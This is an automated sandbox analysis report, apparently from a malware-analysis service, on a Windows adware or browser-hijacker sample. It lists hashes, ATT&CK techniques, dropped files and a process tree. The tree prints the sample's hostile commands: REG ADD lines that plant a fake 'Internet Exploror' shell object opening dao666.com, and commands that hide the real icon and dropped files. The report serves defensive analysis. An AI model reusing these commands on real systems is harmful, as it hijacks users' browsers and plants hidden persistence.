47d52b66a74824c111330feb11bbece063e13e9f9d309deb89c8504b4850513f

Analysis

max time kernel
133s
max time network
127s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
27/01/2024, 02:39

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

790f49dcafe4a77367670c45cde5c863.exe
Size

96KB
MD5

790f49dcafe4a77367670c45cde5c863
SHA1

1ec3cae51d7b10b86eb7f1eca3aa9f2a7e3271ef
SHA256

47d52b66a74824c111330feb11bbece063e13e9f9d309deb89c8504b4850513f
SHA512

8c1981c4e7d72708aa3d33c149b2fb3cea18f496bff61fced75f2a5813821b3284ce397da95a54b380eef5cec0d06e20e20b2c449f0e704c16a68cc9b3e8085c
SSDEEP

1536:igYPhQXwIiPrrjThO+lUBrzCxry1ec7rUyj239au7538iJkZgyfi:FYP2XerzhOUxu/XUtauF8iJkZgb

Score

8^/10

evasion persistence

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003

Sets file to hidden 1 TTPs 6 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1860	attrib.exe
400	attrib.exe
1140	attrib.exe
1856	attrib.exe
1948	attrib.exe
1640	attrib.exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows\360SE.vbs	cmd.exe
File created	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	cmd.exe
File created	C:\Program Files\WinWare\361.cmd	cmd.exe
File created	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	attrib.exe
File created	C:\Program Files\WinWare\winare.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\361.cmd	cmd.exe
File opened for modification	C:\Program Files\WinWare\360SE.vbs	cmd.exe
File created	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\Windows\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\winare.vbs	cmd.exe
File created	C:\Program Files\WinWare\tool.cmd	cmd.exe
File created	C:\Program Files\WinWare\360.cmd	cmd.exe
File created	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File created	C:\Program Files\Windows\360SE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\36OSE.vbs	cmd.exe
File opened for modification	C:\Program Files\WinWare\Internet Exploror.lnk	cmd.exe
File opened for modification	C:\Program Files\WinWare\tool.cmd	attrib.exe
File opened for modification	C:\Program Files\WinWare\360.cmd	attrib.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\is.cmd	cmd.exe
File created	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe
File opened for modification	C:\Windows\Mail\UltraEdit\winare.vbs	cmd.exe

Launches sc.exe 2 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1528	sc.exe
1376	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000969d72c3e5a03a40a0257479feadc03a000000000200000000001066000000010000200000002a48d0b860fa8ee1f11192f42e6bc75c78a90c666b8504ee899042166dbfd090000000000e8000000002000020000000c80bb792aa67aba4bef7dac02d5a5c33e2daae4436b0c4fcc1c92118bdb1633b20000000ce7911b320e6fd59d25f8bcc8c2b51080636c2958b1d8247b76b9948fa94468d40000000d03ec8e53478d45ea269aa41b77df2f9ada054f16583bf787f4e668a38f6df651fdcea4e77868e226c45eaea5d89715c13a5a026916fdf0fbc23e795adb9aca6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000969d72c3e5a03a40a0257479feadc03a00000000020000000000106600000001000020000000903c180e7b77172d7bc533c7c7062a3ad2abec9abb6ae47f21df5403366237d5000000000e80000000020000200000008a3a289f3cf9bb0f451e2d7d6dbc893b41260926fa5ef6b78c68a53e86820c4190000000ff5baa06b30b1d592721ed56d336913b447d1ce04e241add0fd78f9d74c984630f65795189ee0ab0754ae38c1d38c78a6f36640e029eb5914dce48b777b55295658e59dd581f7feba5e397eb42d92b06ee0c1d90b90c663ee7891a3f10f0f33027b9cd40a1e2a9668052d13cad11e0b8ebcd69fa1066a5b68370e4b041c42e7b32c2821e60843e6d8a63f1697ca93a8340000000ba5d583113afb4b9d7e9f78d7835748b54e9e40cff7facd5c92bc813c4c7e1145688c378c536e624b22026b193fca63993f44763171887a8e24e7c061694e3c3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412485058"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 40fec52cca50da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{582F9BE1-BCBD-11EE-95CA-56B3956C75C7} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Modifies registry class 44 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\Attributes = "0"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideFolderVerbs	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\HideOnDesktopPerUser	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ThreadingModel = "Apartment"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\ = "shdoclc.dll,0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\ = "┤≥┐¬╓≈╥│(&H)"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\LocalizedString = "Internet Exploror"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder\WantsParsDisplayName	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command\	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command\ = "C:\\progra~1\\Intern~1\\iexplore.exe http://www.dao666.com/?in"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\ShellFolder	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InfoTip = "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛"	reg.exe

Runs net.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2312	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2312	iexplore.exe
2312	iexplore.exe
2768	IEXPLORE.EXE
2768	IEXPLORE.EXE
2768	IEXPLORE.EXE
2768	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2204 wrote to memory of 2820	2204	790f49dcafe4a77367670c45cde5c863.exe	28
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2820 wrote to memory of 2756	2820	WScript.exe	29
PID 2756 wrote to memory of 2312	2756	cmd.exe	31
PID 2756 wrote to memory of 2312	2756	cmd.exe	31
PID 2756 wrote to memory of 2312	2756	cmd.exe	31
PID 2756 wrote to memory of 2312	2756	cmd.exe	31
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2820 wrote to memory of 2764	2820	WScript.exe	32
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2656	2764	cmd.exe	34
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2764 wrote to memory of 2672	2764	cmd.exe	35
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2312 wrote to memory of 2768	2312	iexplore.exe	36
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 2060	2764	cmd.exe	37
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 1968	2764	cmd.exe	38
PID 2764 wrote to memory of 2944	2764	cmd.exe	39
PID 2764 wrote to memory of 2944	2764	cmd.exe	39
PID 2764 wrote to memory of 2944	2764	cmd.exe	39
PID 2764 wrote to memory of 2944	2764	cmd.exe	39

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1640	attrib.exe
1860	attrib.exe
400	attrib.exe
1140	attrib.exe
1856	attrib.exe
1948	attrib.exe

C:\Users\Admin\AppData\Local\Temp\790f49dcafe4a77367670c45cde5c863.exe
"C:\Users\Admin\AppData\Local\Temp\790f49dcafe4a77367670c45cde5c863.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2204
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ha.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C start /min iexplore http://www.dao666.com/index2.html?cn
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.dao666.com/index2.html?cn
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2312
    - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2312 CREDAT:275457 /prefetch:2
        5⤵
        Modifies Internet Explorer settings
        Suspicious use of SetWindowsHookEx
        
        PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C .\tool.cmd
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoInternetIcon" /t REG_DWORD /d 1 /f
      4⤵
      PID:2656
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}"
      4⤵
      Modifies registry class
      PID:2672
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "InfoTip" /t REG_SZ /d "▓Θ╒╥▓ó╧╘╩╛ Internet ╔╧╡─╨┼╧ó║══°╒╛" /f
      4⤵
      Modifies registry class
      PID:2060
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}" /v "LocalizedString" /t REG_SZ /d "Internet Exploror" /f
      4⤵
      Modifies registry class
      PID:1968
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon"
      4⤵
      Modifies registry class
      PID:2944
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\DefaultIcon" /ve /t REG_EXPAND_SZ /d "shdoclc.dll,0" /f
      4⤵
      Modifies registry class
      PID:2884
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32"
      4⤵
      Modifies registry class
      PID:3048
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /ve /t REG_SZ /d "%systemRoot%\system32\shdocvw.dll" /f
      4⤵
      Modifies registry class
      PID:3056
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\InProcServer32" /v "ThreadingModel" /t REG_SZ /d "Apartment" /f
      4⤵
      Modifies registry class
      PID:3060
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell"
      4⤵
      Modifies registry class
      PID:2032
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell" /ve /t REG_SZ /d "┤≥┐¬╓≈╥│(&H)" /f
      4⤵
      Modifies registry class
      PID:2148
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)"
      4⤵
      Modifies registry class
      PID:1428
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)" /v "MUIVerb" /t REG_SZ /d "@shdoclc.dll,-10241" /f
      4⤵
      Modifies registry class
      PID:2792
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command"
      4⤵
      Modifies registry class
      PID:1560
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\┤≥┐¬╓≈╥│(&H)\Command" /ve /t REG_SZ /d "C:\progra~1\Intern~1\iexplore.exe http://www.dao666.com/?in" /f
      4⤵
      Modifies registry class
      PID:1580
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)"
      4⤵
      Modifies registry class
      PID:1652
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CLASSES_ROOT\CLSID\{e17d4fc0-5564-11d1-83f2-00a0c90dc849}\shell\╩⌠╨╘(&R)\Command"
      4⤵
      Modifies registry class
      PID:2584
  - - C:\Windows\SysWOW64\reg.exe
